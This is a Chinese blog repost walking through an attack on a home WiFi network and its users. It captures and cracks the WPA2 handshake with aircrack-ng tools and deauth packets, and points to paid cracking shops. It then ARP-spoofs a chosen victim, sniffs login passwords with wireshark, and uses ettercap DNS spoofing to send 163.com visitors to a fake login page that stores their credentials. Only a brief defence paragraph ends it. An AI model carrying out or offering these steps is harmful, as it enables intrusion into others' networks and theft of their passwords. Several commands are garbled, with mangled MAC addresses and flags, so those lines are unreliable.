首页 > 编程知识 正文

无线网(内网想用无线)

时间:2023-05-03 18:26:47 阅读:77691 作者:4122

随着无线网络进入我们的生活,在方便我们的同时,也出现了许多安全问题。 如果你不做任何防范的话,一定给黑客打开了大门。 黑客入侵你的无线局域网后,你可以在不经意间拦截到你网络的一举一动,你账户的密码等所有个人信息都会被黑客曝光。

现在,让我们来看看无线网络是如何被入侵和拦截的。

首先,需要配备Kali linux系统的攻击机和外部无线网卡。 我在这里使用的是RT3070L芯片的无驱动器卡,我建议你也买这种类型。 我在购买网卡的时候踩过很多坑,所以我反复购买了好几种网卡,找到了这个与kali 4.15内核兼容的网卡。

淘宝的链接共享

kali linux可以下载到官方网站,但今天没有安装方法。 大家一起百度就可以了。

现在开始正式解密,插入无线网卡,断开有线连接,不要连接到任何网络。

打开终端并输入ifconfig后,将显示无线网卡wlan0

如果看不到,网卡可能没有启动。 您可以输入ifconfig -a查看wlan0网卡,并在ifconfig wlan0 up中启用它。

要启用网卡,必须从airmon-ng start wlan0打开网卡的监听模式

选中后输入ifconfig,可以看到网卡名称为wlan0mon

在这种情况下,airodump-ng wlan0mon可以扫描附近的wifi热点

在这里,我们将使用一个名为Xiaomi_0C327的热点进行演示。 其中,BSSID表示路由器的MAC地址CH表示信道

打开另一个终端,在airodump-ng-C1---- bssid 343360 ce 33600033602633600 c 33601 c-wcapwlan0mon中抓住此路由器。

-c表示通道--bssid表示路由器的mac地址-w指定捕获的包存储在哪个目录中的名称

此时,可以看到此路由器下连接了几个设备和连接设备的mac地址。 但是,由于设备和路由器保持连接,因此无法捕获包含从设备发送到路由器的密码信息的数据包。

所以,通过向路由器发送假身份验证请求来踢掉设备。 设备自动重新连接时,密码会被抓住。

打开另一个终端,输入aireplay-ng-010-a 343360 ce 3360033600 c :0 c-c 983360 ca 3360:0 a :0 f 2336082 WLAN0mon进行脱机操作

-0表示发送鉴权消息10,-a指定路由器mac地址-c指定设备mac地址10

当我们看到“[ WPA handshake: ]”字样时,我们成功地抓住了握力的包。 目录中有几个文件,如下图所示。

最后通过跑词典找到了密码。 打开终端输入airc

rack-ng cap-01.cap -w password.txt 爆破

cap-01.cap 是刚刚抓到的包 -w 指定密码字典

等待一小会儿密码就破解出来了。当然我这里使用的是单线程,你也可以拿抓到的包去其他一些跑包软件里去跑,多线程加GPU能力效率要高一些。或者去网上找那些专门做跑包的店铺,几十块钱就可以出结果。

不过,最近暴出WPA2加密协议有漏洞,黑客可以在路由器和设备间的四次握手中重装加密密钥,这种攻击方式称之为KRACK。也就是说可以无视密码直接连入wifi,不用再进行这些无聊的抓包跑包。据说这些漏洞存在于WPA2协议当中,而非单个产品或实现当中。因此,任何使用WPA2协议的无线网络均可能受到影响。

也不知道现在这个漏洞还能不能利用,找时间测试一下。

好,内网渗透的第一步我们已经完成了,接下来我们要对目标机进行ARP欺骗和DNS劫持。

打开终端输入 airmon-ng stop wlan0mon 关闭网卡的监听模式,然后用刚刚得到的密码连入 Xiaomi_0C327 这个网络

连入后通过 ifconfig 查看网卡被分配的ip地址,可以推断出网关地址。

这里我的 wlan0 网卡分配到的地址是 192.168.31.147 所以网关地址应该就是 192.168.31.1

用 nmap 扫描一下网关,我们就可以看到内网中存活了那些主机

命令 nmap -sP 192.168.31.1/24

这里我选用 192.168.31.181 这台机器作为靶机

打开一个终端,开启自己的流量转发,使靶机的流量可以先经过攻击机,然后再到路由器。

命令 echo 1 > /proc/sys/net/ipv4/ip_forward

然后 cat /proc/sys/net/ipv4/ip_forward 如果返回 1 代表转发开启成功

打开一个终端,通过命令 arpspoof -i wlan0 -t 192.168.31.181 -r 192.168.31.1 对靶机进行ARP欺骗

-i 代表网卡 -t 代表靶机的ip -r 代表网关的ip

这时我们的攻击机已经成为了一个中间人,靶机的所有流量都要先经过攻击机,再到路由器。而靶机用户毫无察觉。

我们先来用一款小工具来监听靶机浏览的图片

打开终端输入 driftnet -i wlan0 等待出图

娱乐一下的小工具,感觉没啥用。接下来,我们抓靶机用户的登录账户和密码。

终端输入 wireshark 打开wireshark抓包工具,选择我们的 wlan0 网卡

用靶机访问 http://www.清脆的飞机.cn/wp-login.php 这个wp网站的后台并登录,然后用攻击机抓包。加上一些过滤条件,方便寻找。

我们还可以对靶机进行DNS劫持。正常情况下访问 http://www.163.com/ 是这个样子

然后用攻击机对这个网址进行DNS劫持,把他解析到我自己写的163邮箱的登录页面。这样用户输入账号密码都会被存下来。

首先在终端输入命令 vi /etc/ettercap/etter.dns 添加一条解析

www.163.com A 47.94.222.65

然后在嗅探欺骗类工具中打开ettercap,【sniff】>【Unified sniffing】,选择我们的 wlan0 网卡。【Plugins】>【Manage the plugins】双击 dns_spoof模块,最后【Start】>【Start sniffing】

这时靶机再访问 http://www.163.com/ 就会变成这个样子

以上的嗅探和欺骗都是建立在 http 协议上的,https 协议的会失效。网上有教程说用 sslstrip 可以对 https进行降级,试了一下是可以降级,但是浏览器会有证书报错提示,用户很容易就能发现问题。

也不知道寂寞的西牛们有没有什么更好的方式

好了,说完了攻击,我们来说说防御。上面所说的嗅探都是建立在内网环境下并且进行了ARP欺骗后的,所以要防守就要注意路由器的安全问题,密码尽量设置的复杂一下,大小写加数字字母符号,这样被暴力破解的几率就会减小。路由器和设备进行双向绑定,防止ARP欺骗。

作者:无穷369链接:https://www.jianshu.com/p/5e2dc94f16df来源:简书著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。